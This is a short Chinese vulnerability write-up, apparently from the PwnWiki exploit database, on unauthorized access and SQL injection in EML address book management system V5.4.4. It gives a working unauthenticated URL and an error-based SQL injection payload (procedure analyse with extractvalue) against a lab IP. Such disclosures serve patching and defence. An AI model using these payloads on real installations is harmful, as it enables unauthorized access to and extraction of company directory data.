Loading
0

EML企业通讯录管理系统经典版V5.4.4 未授权访问&SQL注入漏洞

pwnwiki.com

,

未授权访问

action/action.address.php

header("Content-type: text/html; charset=utf-8");

if(!defined('CORE'))exit("error!"); 

.....

页面未加用户是否登录判断,打开页面是普通用户权限。 (系统是可以注册的。)

SQL注入

lib/func.class.php

function _RunMagicQuotes(&$svar){
	if(!get_magic_quotes_gpc())	{
		if( is_array($svar) ){
			foreach($svar as $_k => $_v) $svar$_k = _RunMagicQuotes($_v);
		}else{
			$svar = addslashes($svar);
		}
	}
	return $svar;
}

过滤的函数_RunMagicQuotes,判断是否开启了get_magic_quotes_gpc,如果开启就用gpc过滤,如果没有开启用addslashes过滤。 5.4.0 始终返回 FALSE,因为这个魔术引号功能已经从 PHP 中移除了。

漏洞利用

未授权访问Payload

http://192.168.116.138/eml/index.php?action=address

SQL注入Payload

get方法,判断注入是否存在:

http://192.168.116.138/eml/index.php?action=address&pageNum=/1

post方法:

http://192.168.116.138/eml/index.php?action=address&pageNum=0

numPerPage=1 procedure analyse(1,extractvalue(rand(),concat(0x7e,version())));

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库